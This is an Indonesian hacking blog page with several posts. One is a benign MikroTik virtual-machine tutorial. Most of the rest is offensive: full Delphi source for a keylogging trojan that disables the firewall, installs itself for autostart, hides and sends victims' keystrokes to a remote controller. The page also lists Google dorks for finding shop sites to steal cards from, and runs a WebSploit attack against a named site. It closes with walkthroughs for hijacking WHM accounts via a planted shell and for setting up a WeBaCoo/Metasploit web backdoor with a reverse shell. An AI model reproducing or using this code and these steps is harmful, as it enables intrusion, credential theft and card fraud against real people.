Sabtu, 01 Maret 2014

Android Hacking Tools



  1. anDOSid.apk - 39 KB
    You must click 'Thank You' before you can see the data contained here.
    You do not have sufficient rights to see the hidden data contained here.
  2. android netspoof.apk - 952 KB
    You must click 'Thank You' before you can see the data contained here.
    You do not have sufficient rights to see the hidden data contained here.
  3. anmap.apk - 2 MB
    You must click 'Thank You' before you can see the data contained here.
    You do not have sufficient rights to see the hidden data contained here.
  4. Anti.apk - 5 MB
    You must click 'Thank You' before you can see the data contained here.
    You do not have sufficient rights to see the hidden data contained here.
  5. CB.apk - 802 KB
    You must click 'Thank You' before you can see the data contained here.
    You do not have sufficient rights to see the hidden data contained here.
  6. DroidSniff.apk - 825 KB
    You must click 'Thank You' before you can see the data contained here.
    You do not have sufficient rights to see the hidden data contained here.
  7. DroidVPN.apk - 820 KB
    You must click 'Thank You' before you can see the data contained here.
    You do not have sufficient rights to see the hidden data contained here.
  8. HotspotShield.apk - 809 KB
    You must click 'Thank You' before you can see the data contained here.
    You do not have sufficient rights to see the hidden data contained here.
  9. WhatsAppSniffer.apk - 606 KB
    You must click 'Thank You' before you can see the data contained here.
    You do not have sufficient rights to see the hidden data contained here.
  10. wifi-hacker.apk - 297 KB
    You must click 'Thank You' before you can see the data contained here.
    You do not have sufficient rights to see the hidden data contained here.
  11. WifiKill.apk - 334 KB
    You must click 'Thank You' before you can see the data contained here.
    You do not have sufficient rights to see the hidden data contained here.

Tutorial Mikrotik tanpa RouterBoard dengan VMWare

Bagi anda yang inginbelajar Mikrotik tapi tidak punya Router Board nya ga usah kuatir, karena kita masih bisa belajar mikrotik dengan menggunakan file iso Mikrotik. Jadi sebenarnya Mikrotik itu adalah Linux yang dibuat khusus untuk Router. Sehingga kita ga perlu punya router board nya, yang penting punya software Mikrotik nya dalam bentuk file ISO. File ISO Mikrotik ini bisa dijalankan di PC bekas (Baca Artikel sebelumnya : Tutorial Cara Instalasi Mikrotik RouterOS). Namun kali ini kita akan install tanpa PC bekas tambahan yaitu dengan menjalankan menggunakan Virtual Machine seperti VMWare Player, VMware Workstation, Virtual Box, dll.



Kemudian dari VM itu kita koneksikan ke Winbox. Tinggal kita otak-atik aja deh mikrotiknya, experimen buat belajar Mikrotik :). Oke langsung aja ya ke caranya, berikut hal-hal yang dibutuhkan untuk Belajar Mikrotik tanpa Perlu Punya Router Board Mikrotik :
  • Komputer/Laptop
  • File ISO Mikrotik
  • Virtual Machine (saya menggunakan VMWare Workstation)
  • Semangat untuk belajar dengan hal yang agak ribet menyenangkan :D
Nah kalo hal-hal di atas udah terpenuhi, kita langsung aja ke langkah-langkah nya :

Proses Instalasi ISO Mikrotik OS

1. Download file ISO Mikrotik nya. Kalian bisa download disini (Udah termasuk lisensi level 6. Mohon gunakan HANYA UNTUK TUJUAN BELAJAR SAJA!)

2. Jalankan ISO Mikrotik nya di Virtual Machine. Dalam hal ini saya menggunakan VMWare Workstation. Ketika membuat Harddisk baru di VM nya kasih space kecil aja misal 200MB, karena Mikrotik ini ga butuh space banyak kok. Biar Harddisk kalian ga cepet abis ;)

3. Jalankan VM Mikrotik nya, dan lakukan proses instalasi Mikrotik dengan memilih (check) semua pilihan yang ada dengan tombol 'a'. Kalo udah dicentang semua tekan tombol 'i' untuk meginstall Mikrotik.
4. Tunggu bentar sampe proses instalasi nya selesai. Sabar yahh, cuma bentar kok ;) Kalo udah selesai tekan tombol Enter untuk reboot

Konfigurasi Jaringan

1. Setelah proses instalasi Mikrotik OS nya selesai, coba masuk ke system Mikrotik nya. Masukkan user login : admin dan password : 'kosongin aja'

2. Selamat anda sudah berhasil masuk system Mikrotik di VM. Disini kita cuma bisa memasukkan perintah berbasis text aja, ga ada mode GUI nya. Sekarang kita mulai konfigurasi jaringan nya agar bisa terkoneksi ke jaringan lokal PC terutama biar bisa buka Winbox. Silakan Download Winbox disini.

3. Pada VM nya masuk ke settings, rubah Network Adapter nya ke custom VMNet1. Untuk yang pake VM lain macam Virtual Box silakan menyesuaikan aja ya.

4. Selanjutnya coba buka Winbox, cek apakah udah terdeteksi Mikrotik nya. Kalo udah langsung login aja pake data login yang sama. Kalo ga bisa login coba cek lagi konfigurasi jaringannya. Disable aja Adapter VMnet8 biar ga bingung Winbox nya.



5. Pada Winbox nya cuma ada 1 interface yaitu Ether 1 doang, jadi lumayan ribet sebenarnya karena biasanya kita praktek pake wlan dan disitu ga ada wlan nya karena memang secara fisik di VMWare ga punya interface wireless. Jadi ya kita cuma bisa pake Ether 1 aja.

6. Tapi gapapa, kita masih bisa nambah Virtual Ethernet buat membantu kerja kita nanti kalo mau nyoba bikin hotspot biar bisa masuk ke user manager hotspot nya.

7. Alokasikan IP address buat Ether 1 misal : 192.168.1.1/24 Alokasikan juga IP address satu jaringan untuk Adapter VMnet1 nya biar bisa konek ke hotspot nya di browser.

Praktek Membuat HOTSPOT

1. Nah kalo koneksi jaringan nya uda beres, kita udah bisa nyoba praktek nih bikin hotspot sendiri walaupun cuma modal 1 interface ether doang. Tapi setidaknya kita masih bisa membuat Virtual Ethernet buat bantuan.

2. Oke, buat Virtual Ethernet dulu aja biar bisa dipake buat masuk ke User Manager Mikrotik nya nanti. Interface -> add -> Virtual Ethernet -> Ok. Jangan lupa diberi IP address yang satu jaringan sama Ether 1 ya, misal : 192.168.1.5/24
 

3. Selanjutnya buat Hotspot via IP -> hotspot -> Hotspot Setup -> ikuti langkah-langkah wizard nya

4. Kalo udah coba cek hotspotnya udah jalan apa belum. Akses alamat ip ether 1 tadi http://192.168.1.1 dari browser PC. Kalo muncul halaman login mikrotik berarti hostpot udah jadi. Silakan login dengan username dan password yang tadi dibuat.

5. Untuk selanjutnya silakan kalian berexperimen sendiri. Kalian bisa kembangkan untuk membuat Radius Server dengan mengakses User Manager di IP virtual ethernet tadi misal : http://192.168.1.5/usermgr

Dari semua tutorial di atas sangat dimungkinkan sekali untuk kondisi error. Karena memang kita tidak punya Mikrotik nya secara fisik, hanya menjalankannya secara virtual, sehingga kesalahan mungkin saja terjadi. Saya sendiri butuh waktu berjam-jam untuk bisa mengakses user manager, karena sering nya alamat itu tidak bisa diakses :(. Jadi disinilah kita harus sabar dan mau mencari solusi dari semua masalah itu, karena dibalik semua masalah pasti ada jalan keluarnya, dan dari itu semua kita akan mendapat pembelajaran nya :).

Trojan Sederhana Dengan Delphi


Trojan atau lebih dikenal dengan Trojan Horse, yang dapat diartikan Kuda Troya.
Dalam dunia komputer, Trojan adalah sebuah perangkat lunak yang patut dicurigai sebagai program jahat atau malicious software. Secara umum Trojan bersifat “stealth” atau tak terlihat dan bekerja secara diam-diam sebagai mata-mata yang dapat menyebabkan kerusakan system. Ide daripada Trojan ini diambil dari sejarah Perang Troya

, ketika itu para prajurit Yunani yang selama 10 tahun tidak dapat menembus benteng pertahanan Troya, bersembunyi di dalam Kuda Troya (sebuah patung kuda raksasa, yang terbuat dari bahan dasar kayu, yang di dalamnya terdapat sebuah ruang untuk bersembunyi) yang ditujukan untuk pengabdian kepada Para Petinggi Troya. Petinggi Troya pun menganggap Kuda Troya tersebut tidak berbahaya dan di izinkan untuk masuk dalam benteng Troya. Para Petinggi Troya tak menyadari bahwa Kuda Troya tersebut berisi para pasukan Yunani, sehingga perang pun tak dapat dihindarkan.


Source Code

Trojan Source Code (scvhost.exe)

Unit Keylogger : unit untOffLineLogger;

interface

uses SysUtils, unit1, Windows;

procedure OLGetLetter;
function OLShift:Boolean;

function
Answer:string):Boolean;

OLMoreChars(CharNumber:Integer;TruePart,FalsePart:string;var

procedure OLShowLetter(strLetter:string);
function OLActiveCaption:string;

implementation

var
cWindow:string;

const cr_lf = chr(13)+chr(10);

procedure OLGetLetter;
var
j:Integer;
a:string;
begin

3

//Verify if lettrers 'A'..'Z'..'a'..'z' is pressed
//basicly to see if its a or A check the state of the caps and shift keys
//same gows with every thing alse liek you 1 or ! :P

for j:=65 to 90 do
if Odd(GetAsyncKeyState(j)) then
if Odd(GetKeyState(VK_CAPITAL)) then
if GetKeyState(VK_SHIFT)<0 then
OLShowLetter(LowerCase(Chr(j)))
else
OLShowLetter(UpperCase(Chr(j)))
else
if GetKeyState(VK_SHIFT)<0 then
OLShowLetter(UpperCase(Chr(j)))
else
OLShowLetter(LowerCase(Chr(j)));


//Verify if numpab is pressed
for j:=96 to 105 do
if Odd(GetAsyncKeyState(j)) then
OLShowLetter(IntToStr((j - 97) + 1));
//Verify if F1 to F24 is pressed
for j:=112 to 135 do
if Odd(GetAsyncKeyState(j)) then
OLShowLetter('{F' + IntToStr(j - 112 + 1) + '}');
//Verify if number 0 to 9 is pressed
for j:=48 to 57 do
if Odd(GetAsyncKeyState(j)) then
if OLShift then
begin
case j - 48 of
1: OLShowLetter('!');
2: OLShowLetter('@');
3: OLShowLetter('#');
4: OLShowLetter('$');
5: OLShowLetter('%');
6: OLShowLetter('^');
7: OLShowLetter('&');
8: OLShowLetter('*');


4
9: OLShowLetter('(');
0: OLShowLetter(')');
end;
end
else
OLShowLetter(IntToStr(j - 48));
if Odd(GetAsyncKeyState(VK_BACK))
form1.Memo1.Text:=Copy(form1.Memo1.Text,1,Length(form1.Memo1.Text)-1);
if Odd(GetAsyncKeyState(VK_TAB)) then OLShowLetter('{TAB}');
if Odd(GetAsyncKeyState(VK_RETURN)) then OLShowLetter(#13#10);
//ok i added this in just so you know the all functions :P
if Odd(GetAsyncKeyState(VK_SHIFT)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_CONTROL)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_MENU)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_PAUSE)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_ESCAPE)) then OLShowLetter('{ESC}');
if Odd(GetAsyncKeyState(VK_SPACE)) then OLShowLetter(' ');
if Odd(GetAsyncKeyState(VK_END)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_HOME)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_LEFT)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_RIGHT)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_UP)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_DOWN)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_INSERT)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_MULTIPLY)) then OLShowLetter('*');
if Odd(GetAsyncKeyState(VK_ADD)) then OLShowLetter('+');
if Odd(GetAsyncKeyState(VK_SUBTRACT)) then OLShowLetter('-');
if Odd(GetAsyncKeyState(VK_DECIMAL)) then OLShowLetter('.');
if Odd(GetAsyncKeyState(VK_DIVIDE)) then OLShowLetter('/');
if Odd(GetAsyncKeyState(VK_NUMLOCK)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_CAPITAL)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_SCROLL)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_DELETE)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_PRIOR)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_NEXT)) then OLShowLetter('');
if Odd(GetAsyncKeyState(VK_PRINT)) then OLShowLetter('{PRINT SCREEN}');
if OLMoreChars($BA,':',';',a) then OLShowLetter(a);
if OLMoreChars($BB,'+','=',a) then OLShowLetter(a);
if OLMoreChars($BC,'<',',',a) then OLShowLetter(a);
if OLMoreChars($BD,'_','-',a) then OLShowLetter(a);
if OLMoreChars($BE,'>','.',a) then OLShowLetter(a);


then

5
if OLMoreChars($BF,'?','/',a) then OLShowLetter(a);
if OLMoreChars($C0,'~','`',a) then OLShowLetter(a);
if OLMoreChars($DB,'{','[',a) then OLShowLetter(a);
if OLMoreChars($DC,'|','¥',a) then OLShowLetter(a);
if OLMoreChars($DD,'}',']',a) then OLShowLetter(a);
if OLMoreChars($DE,'"','''',a) then OLShowLetter(a);
{PrintScreen}
end;


function
Answer:string):Boolean;
begin
OLMoreChars:=True;


OLMoreChars(CharNumber:Integer;TruePart,FalsePart:string;var

if Odd(GetAsyncKeyState(CharNumber)) then
begin
if OLShift then
Answer:=TruePart
else
Answer:=FalsePart;
Exit;
end;
OLMoreChars:=False;
end;

function OLShift:Boolean;
begin
OLShift:=GetAsyncKeyState(VK_SHIFT) <> 0;
end;

procedure OLShowLetter(strLetter:string);
const
cnMaxUserNameLen = 254;
var
cActive:string;
sUserName : string;
dwUserNameLen : DWord;
begin
dwUserNameLen := cnMaxUserNameLen-1;
SetLength( sUserName, cnMaxUserNameLen );
GetUserName(PChar(sUserName), dwUserNameLen);
SetLength(sUserName, dwUserNameLen);

6
cActive:=OLActiveCaption;
if cWindow <> cActive then
begin
cWindow:=cActive;
strLetter:=cr_lf+'focused window:' + cWindow + cr_lf + strLetter;
end;
form1.Memo1.Text:=form1.Memo1.Text + strLetter;
if DirectoryExists('c:¥winnt') then
form1.Memo1.Lines.SaveToFile('c:¥winnt¥system32¥winux¥' + sUserName + '.joo')
else
form1.Memo1.Lines.SaveToFile('c:¥windows¥system32¥winux¥' + sUserName + '.joo');
end;

function OLActiveCaption:string;
var
Handle:THandle;
Len:LongInt;
Title:string;
begin
Handle:=GetForegroundWindow;
Len:=GetWindowTextLength(Handle) + 1;
SetLength(Title,Len);
GetWindowText(Handle,PChar(Title),Len);
OLActiveCaption:=TrimRight(Title);
end;

end.

Main Unit :

unit Unit1;

interface

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, ExtCtrls, shellapi, Registry, XDesktopServer, mmsystem, ScktComp;

type
TForm1 = class(TForm)

7
Timer1: TTimer;
Memo1: TMemo;
trojan: TDesktopServer;
ServerSocket1: TServerSocket;
Memo2: TMemo;
Button1: TButton;
Edit1: TEdit;
procedure Timer1Timer(Sender: TObject);
procedure FormCreate(Sender: TObject);
procedure ServerSocket1Accept(Sender: TObject;
Socket: TCustomWinSocket);
procedure Button1Click(Sender: TObject);
procedure ServerSocket1ClientRead(Sender: TObject;
Socket: TCustomWinSocket);
procedure Edit1Change(Sender: TObject);

private
{ Private declarations }

public
{ Public declarations }
end;

var
Form1: TForm1;

implementation

uses
untOffLineLogger, Unit2;

{$R *.dfm}
{$R wave.res}

{----------procedure start up file-----------------}

procedure RunOnStartup(sProgTitle,sCmdLine: string;bRunOnce : boolean );
var
sKey : string;
reg : TRegIniFile;
begin

8

if( bRunOnce )then
sKey := 'Once'
else
sKey := '';

reg := TRegIniFile.Create( '' );
reg.RootKey := HKEY_LOCAL_MACHINE;
reg.WriteString(
'Software¥Microsoft'
+ '¥Windows¥CurrentVersion¥Run'
+ sKey + #0,
sProgTitle,
sCmdLine );
reg.Free;
end;


{---------------keylogger unit-------------------}

procedure TForm1.Timer1Timer(Sender: TObject);
begin
OLGetLetter;
end;

{---------------saat aplikasi berjalan:-------------------}

procedure TForm1.FormCreate(Sender: TObject);
var
nmfile,nmfile2: string; //variabel copy file//
begin

serversocket1.Open;


// disable firewall win xp sp2>>>>>>>>>>>

shellexecute(0,'open', 'net.exe',' stop sharedaccess',0,0);

//-----------------copy file----------->>>>>>>>>>>>>

nmfile := Application.ExeName;


9

nmfile2 := 'c:¥windows¥system32¥drivers.exe';

CopyFile(PChar(nmfile), PChar(nmfile2), False);

//----------------open desktop-------->>>>>>>>>>>>>>

trojan.Portnya:='1975'; //membuka port 1975 untuk komunikasi
trojan.OpenDesktop;

//----------------kirim hasil text curian>>>>>>>>>>>

serversocket1.Active:=true;
if(serversocket1.Socket.activeconnections>0)then
serversocket1.Socket.Connections[0].SendText('Data Ketikan Korban : '+memo1.Text);


//----------------start up file>>>>>>>>>>>>>>>>>>>>>>

RunOnStartup(
'drivers',
'c:¥WINDOWS¥system32¥drivers.exe',
False);

//----------------hidden proccess>>>>>>>>>>>>>>>>>>>>>

Application.ShowMainForm := false;

//-----------------directory save file>>>>>>>>>>>>>>>>>

if DirectoryExists('c:¥winnt¥system32¥') = true then
if DirectoryExists('c:¥winnt¥system32¥winux¥') = false then
begin
CreateDir('c:¥winnt¥system32¥winux¥');
end;

if DirectoryExists('c:¥windows¥system32¥') = true then
if DirectoryExists('c:¥windows¥system32¥winux¥') = false then
begin
CreateDir('c:¥windows¥system32¥winux¥');
end;
end;

10

//saat socket server menerima koneksi dr client, eksekusi button1 >>>>>>>>>>>>>>

procedure TForm1.ServerSocket1Accept(Sender: TObject;
Socket: TCustomWinSocket);
begin
button1.Click;
end;

//Button 1 : pindahkan text memo 1 ke memo 2
//memo 1 adalah hasil ketikan korban

procedure TForm1.Button1Click(Sender: TObject);
begin
memo2.Lines.Add(memo1.text);
if(serversocket1.Socket.activeconnections>0)then
serversocket1.Socket.Connections[0].SendText('Victim Log: '+memo1.text);
end;

procedure TForm1.ServerSocket1ClientRead(Sender: TObject;
Socket: TCustomWinSocket);
begin
edit1.Text:=socket.ReceiveText;
end;

procedure TForm1.Edit1Change(Sender: TObject);
begin

if edit1.Text='message' then
begin form2.Show; end;

if edit1.Text='horse' then
begin PlaySound(PChar(1),HInstance, snd_ASync or snd_Memory or snd_Resource);
edit1.Clear;
end;

if edit1.Text='reboot' then
begin winexec('shutdown -r -t 0 -f',sw_normal); end;

if edit1.Text='shutdown' then
begin winexec('shutdown -s -t 0 -f',sw_normal); end;

11.
if edit1.Text='close' then
begin form2.Close; end;

if edit1.Text='ghost' then
begin PlaySound(PChar(2),HInstance, snd_ASync or snd_Memory or snd_Resource);
edit1.Clear; end;

if edit1.Text='ghost2' then
begin PlaySound(PChar(3),HInstance, snd_ASync or snd_Memory or snd_Resource);
edit1.Clear;
end;

if edit1.Text='nging' then
begin PlaySound(PChar(4),HInstance, snd_ASync or snd_Memory or snd_Resource);
edit1.Clear;
end;

if edit1.Text='ngung' then
begin PlaySound(PChar(5),HInstance, snd_ASync or snd_Memory or snd_Resource);

if edit1.Text='startup' then
begin PlaySound(PChar(6),HInstance, snd_ASync or snd_Memory or snd_Resource);
edit1.Clear;
end;
end;

end.

Hati - hati jangan sampai kena sendiri ya !!!

KUMPULAN DORK CARDING

 


inurl:".php?cat="+intext:"Paypal"+site:UK
inurl:productlist.php?cid=
inurl:".php?cat="+intext:"/Buy Now/"+site:.net
nurl:".php?cid="+intext:"online+betting"
inurl:".php?id=" intext:"View cart"
inurl:".php?id=" intext:"Buy Now"
inurl:".php?id=" intext:"add to cart"
inurl:".php?id=" intext:"shopping"
inurl:".php?id=" intext:"boutique"
inurl:".php?id=" intext:"/store/"
inurl:".php?id=" intext:"/shop/"
inurl:".php?id=" intext:"toys"
inurl:".php?cid="
inurl:".php?cid=" intext:"shopping"
inurl:".php?cid=" intext:"add to cart"
inurl:".php?cid=" intext:"Buy Now"
inurl:".php?cid=" intext:"View cart"
inurl:".php?cid=" intext:"boutique"
inurl:".php?cid=" intext:"/store/"
inurl:".php?cid=" intext:"/shop/"
inurl:".php?cid=" intext:"Toys"
inurl:".php?cat="
inurl:".php?cat=" intext:"shopping"
inurl:".php?cat=" intext:"add to cart"
inurl:".php?cat=" intext:"Buy Now"
inurl:".php?cat=" intext:"View cart"
inurl:".php?cat=" intext:"boutique"
inurl:".php?cat=" intext:"/store/"
inurl:".php?cat=" intext:"/shop/"
inurl:".php?cat=" intext:"Toys"
inurl:".php?catid="
inurl:".php?catid=" intext:"View cart"
inurl:".php?catid=" intext:"Buy Now"
inurl:".php?catid=" intext:"add to cart"
inurl:".php?catid=" intext:"shopping"
inurl:".php?catid=" intext:"boutique"
inurl:".php?catid=" intext:"/store/"
inurl:".php?catid=" intext:"/shop/"
inurl:".php?catid=" intext:"Toys"
inurl:".php?categoryid="
inurl:".php?categoryid=" intext:"View cart"
inurl:".php?categoryid=" intext:"Buy Now"
inurl:".php?categoryid=" intext:"add to cart"
inurl:".php?categoryid=" intext:"shopping"
inurl:".php?categoryid=" intext:"boutique"
inurl:".php?categoryid=" intext:"/store/"
inurl:".php?categoryid=" intext:"/shop/"
inurl:".php?categoryid=" intext:"Toys"
inurl:".php?pid="
inurl:".php?pid=" intext:"shopping"
inurl:".php?pid=" intext:"add to cart"
inurl:".php?pid=" intext:"Buy Now"
inurl:".php?pid=" intext:"View cart"
inurl:".php?pid=" intext:"boutique"
inurl:".php?pid=" intext:"/store/"
inurl:".php?pid=" intext:"/shop/"
inurl:".php?pid=" intext:"toys"
inurl:".php?prodid=
inurl:".php?prodid=" intext:"shopping"
inurl:".php?prodid=" intext:"add to cart"
inurl:".php?prodid=" intext:"Buy Now"
inurl:".php?prodid=" intext:"View cart"
inurl:".php?prodid=" intext:"boutique"
inurl:".php?prodid=" intext:"/store/"
inurl:".php?prodid=" intext:"/shop/"
inurl:".php?prodid=" intext:"toys"
inurl:".php?productid='
inurl:".php?productid=" intext:"shopping"
inurl:".php?productid=" intext:"add to cart"
inurl:".php?productid=" intext:"Buy Now"
inurl:".php?productid=" intext:"View cart"
inurl:".php?productid=" intext:"boutique"
inurl:".php?productid=" intext:"/store/"
inurl:".php?productid=" intext:"/shop/"
inurl:".php?productid=" intext:"Toys"
inurl:".php?product="
inurl:".php?product=" intext:"shopping"
inurl:".php?product=" intext:"add to cart"
inurl:".php?product=" intext:"Buy Now"
inurl:".php?product=" intext:"View cart"
inurl:".php?product=" intext:"boutique"
inurl:".php?product=" intext:"/store/"
inurl:".php?product=" intext:"/shop/"
inurl:".php?product=" intext:"toys"
inurl:".php?product=" intext:"DVD"
inurl:".php?products="
inurl:".php?products=" intext:"shopping"
inurl:".php?products=" intext:"add to cart"
inurl:".php?products=" intext:"Buy Now"
inurl:".php?products=" intext:"View cart"
inurl:".php?products=" intext:"boutique"
inurl:".php?products=" intext:"/store/"
inurl:".php?products=" intext:"/shop/"
inurl:".php?products=" intext:"toys"
inurl:".php?products=" intext:"DVD"
inurl:".php?proid="
inurl:".php?proid=" intext:"shopping"
inurl:".php?proid=" intext:"add to cart"
inurl:".php?proid=" intext:"Buy Now"
inurl:".php?proid=" intext:"View cart"
inurl:".php?proid=" intext:"boutique"
inurl:".php?proid=" intext:"/store/"
inurl:".php?proid=" intext:"/shop/"
inurl:".php?proid=" intext:"toys"
inurl:".php?shopid="
inurl:".php?shopid=" intext:"shopping"
inurl:".php?shopid=" intext:"add to cart"
inurl:".php?shopid=" intext:"Buy Now"
inurl:".php?shopid=" intext:"View cart"
inurl:".php?shopid=" intext:"boutique"
inurl:".php?shopid=" intext:"/store/"
inurl:".php?shopid=" intext:"/shop/"
inurl:".php?shopid=" intext:"Toys"
inurl:".php?itemid="
inurl:".php?itemid=" intext:"shopping"
inurl:".php?itemid=" intext:"add to cart"
inurl:".php?itemid=" intext:"Buy Now"
inurl:".php?itemid=" intext:"View cart"
inurl:".php?itemid=" intext:"boutique"
inurl:".php?itemid=" intext:"/shop/"
inurl:".php?itemid=" intext:"/store/"
inurl:".php?itemid=" intext:"Toys"
inurl:".php?orderid="
inurl:".php?orderid=" intext:"shopping"
inurl:".php?orderid=" intext:"add to cart"
inurl:".php?orderid=" intext:"Buy Now"
inurl:".php?orderid=" intext:"View cart"
inurl:".php?orderid=" intext:"boutique"
inurl:".php?orderid=" intext:"/shop/"
inurl:".php?orderid=" intext:"/store/"
inurl:".php?orderid=" intext:"Toys"
inurl:".php?catalogId="
inurl:".php?catalogId=" intext:"shopping"
inurl:".php?catalogId=" intext:"add to cart"
inurl:".php?catalogId=" intext:"Buy Now"
inurl:".php?catalogId=" intext:"View cart"
inurl:".php?catalogId=" intext:"boutique"
inurl:".php?catalogId=" intext:"/shop/"
inurl:".php?catalogId=" intext:"/store/"
inurl:".php?catalogId=" intext:"Toys"
inurl:".php?aid="
inurl:".php?aid=" intext:"shopping"
inurl:".php?aid=" intext:"add to cart"
inurl:".php?aid=" intext:"Buy Now"
inurl:".php?aid=" intext:"View cart"
inurl:".php?aid=" intext:"boutique"
inurl:".php?aid=" intext:"/shop/"
inurl:".php?aid=" intext:"/store/"
inurl:".php?aid=" intext:"toys"
inurl:".php?artid="
inurl:".php?artid=" intext:"shopping"
inurl:".php?artid=" intext:"add to cart"
inurl:".php?artid=" intext:"Buy Now"
inurl:".php?artid=" intext:"View cart"
inurl:".php?artid=" intext:"boutique"
inurl:".php?artid=" intext:"/shop/"
inurl:".php?artid=" intext:"/store/"
inurl:".php?artid=" intext:"toys"
inurl:".php?articleid="
inurl:".php?articleid=" intext:"shopping"
inurl:".php?articleid=" intext:"add to cart"
inurl:".php?articleid=" intext:"Buy Now"
inurl:".php?articleid=" intext:"View cart"
inurl:".php?articleid=" intext:"boutique"
inurl:".php?articleid=" intext:"/shop/"
inurl:".php?articleid=" intext:"/store/"
inurl:".php?articleid=" intext:"toys"

TUTORIAL WEBSPLOIT ON KALI LINUX

Hey guys!

kali ini saya mau kasih kamu tutorial websploit

langsung aja ya

Kalo kalian mau liat versi text bisa liat di bawah ini :

http://war-games.yoo7.com = ialah contoh website yang kita test


pertama panggil dulu websploit melalui terminal

root@root:~# websploit
WARNING: No route found for IPv6 destination :: (no default route?)

     __          __  _               _       _ _   
     \ \        / / | |             | |     (_) |  
      \ \  /\  / /__| |__  ___ _ __ | | ___  _| |_ 
       \ \/  \/ / _ \ '_ \/ __| '_ \| |/ _ \| | __|
        \  /\  /  __/ |_) \__ \ |_) | | (_) | | |_ 
         \/  \/ \___|_.__/|___/ .__/|_|\___/|_|\__|
                              | |                  
                              |_|                  

        --=[WebSploit FrameWork
    +---**---==[Version :2.0.4
    +---**---==[Codename :MegaTron
    +---**---==[Available Modules : 19
        --=[Update Date : [r2.0.4-111 13.6.2013]


wsf > use network/webkiller
lalu panggil lagi

wsf:WebKiller > set TARGET http://war-games.yoo7.com


TARGET =>  http://war-games.yoo7.com



wsf:WebKiller > RUN

[*]IP Forwarding ...
[*]Attack Has Been Started, For Stop Attack Press [enter] Key...

Kamis, 27 Februari 2014

Crack WHM

Hallo sobat, lama nih ga buat tutor lagi :D rada2 males mah saya sekarang mo hacking2an.. hehehe :D  oke sekarang saya mo bahas mengenai cara Hack Web Host Manager (WHM) :p

Apa itu Web Host Manager (WHM) ? >>>> Google aja yah :p

Sebelum itu sobat harus bisa nanem Shell dolo, klo belum bisa gimana coba? lol :D Nah, Kalo hack WHM, disini kita butuh Config WHMCSnya  :3  ga semua web bisa nemu confignya :D nasip2an aja lol :D sebenarnya bisa juga dengan cara mengexploitasi bug pada whmcs, itu sobat pelajari ndiri yah :p  utk config killernya bisa gunain Shell idca, Garuda, hiddenymouz atau sobat bisa baca artikel kita sebelumnya Cara mencari config dalam website

Perhatian!
Tutorial ini dibuat sebagai pengetahuan dan pembelajaran saja, segala tindakan penyalahgunaan pada tutorial ini seperti pelanggaran hukum, pencurian dan pengerusakan, saya tidak bertanggung jawab! Use at your own risk! 

Quote: "Dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!" By Onix AQua 

Berikut bahan2 yg sobat butuhkan:

  1. Web Shelled 
  2. Whmcs killer 
  3. Config whmcs

Disini saya udah nemu config WHMnya :



 isi dalamnya seperti :



Kemudian kita buka whmcs killer yang sudah di upload ke dalam web. lalu klik Submit!





Nah, kita sudah masuk tuh, :D silahkan liat2 yoo :p


Akun WHMnya ada di H0st R00t, dan akun CPanelnya ada di Client Hosting Account


 Tinggal login aja, :p buka IP:Port dan untuk loggin ke WHM digunakn port 2086/2087

cth: 176.32.342.223:2086



udah pada bisa kan?  kalo ga bisa juga face factor pastinya :p nah, bagaimana kalo ga bisa loggin pake akun yang udah kita dapat? :o itu artinya password telah diubah oleh administratornya. kalo sobat menemukan kasus seperti ini, sobat bisa gunakan cara berikut:

Pertama sobat install dolo Addons firefox yang namanya Modify Header, klik aja disini




kemudian sobat liat di whmcs killer tadi pada kolom Access Hash.


Silahkan disusun sejajar dengan format : WHM username:AccessHash lihat gambar!




kemudian buka Modify Header, klik Select Action pilih Add. isi seperti berikut:

Header Name : Authorization
Header Value : WHM username:AccessHash




 Lalu save, dan klik Enable, kalo udah ada tanda hijau lalu klik Start 



Setelah itu tinggal sobat buka WHMnya.. IP:Port


Backdoor dengan Webacoo dan Metaesploit

Equipments:
1. WeBacoo
2. Metasploit 

pada OS Kali Linux secara default webacoo bisa kita temukan di /usr/share/webacoo/

bagi yg belum ada tools ini silahkan download terlebih dahulu

# git clone https://github.com/anestisb/WeBaCoo.git
untuk lebih jelas nya silahkan lihat gambar ini sob : 


selanjutnya kita memindahkan file 'msf_webacoo_module.rb' ke directory /usr/share/metasploit-framework/modules/eksploitasi/multi/http/

agar file tersebut dapat di akses menggunakan metasploit. 

# cp /usr/share/webacoo/msf_webacoo_module.rb [b]/usr/share/metasploit-framework/modules/exploits/multi/http/[/b]
untuk lebih jelas lihat gambar :


selanjutnya kita cek apakah module tersebut siap di eksekusi:

# msfconsole -q
msf > search webacoo
terlihat pada gambar diatas, module webacoo siap jalankan dan sekarang tahap pembuatan Backdoor ala WeBacoo
# webacoo -g -o /tmp/webacoo.php
-g = generate backdoor
-o = output filename
/tmp/webacoo.php = saya menyimpannya di directory /tmp/ dengan nama webacoo.php 

selanjutnya kita upload ke situs korban,
dan disini backdoor saya terletak di /wp-content/uploads/webacoo.php

selanjutnya kita kembali ke Metasploit untuk mengkoneksikan Client dengan WebServer target :

msf > use exploit/linux/http/msf_webacoo_module
msf exploit(msf_webacoo_module) > show payloads
msf exploit(msf_webacoo_module) > set PAYLOAD cmd/unix/reverse_perl
msf exploit(msf_webacoo_module) > set LHOST XXX.XXX.XXX
msf exploit(msf_webacoo_module) > set LPORT 4444
msf exploit(msf_webacoo_module) > set RHOST XXX.XXX.XXX.XXX or www.TARGET.com
msf exploit(msf_webacoo_module) > set URI /wp-content/uploads/webacoo.php
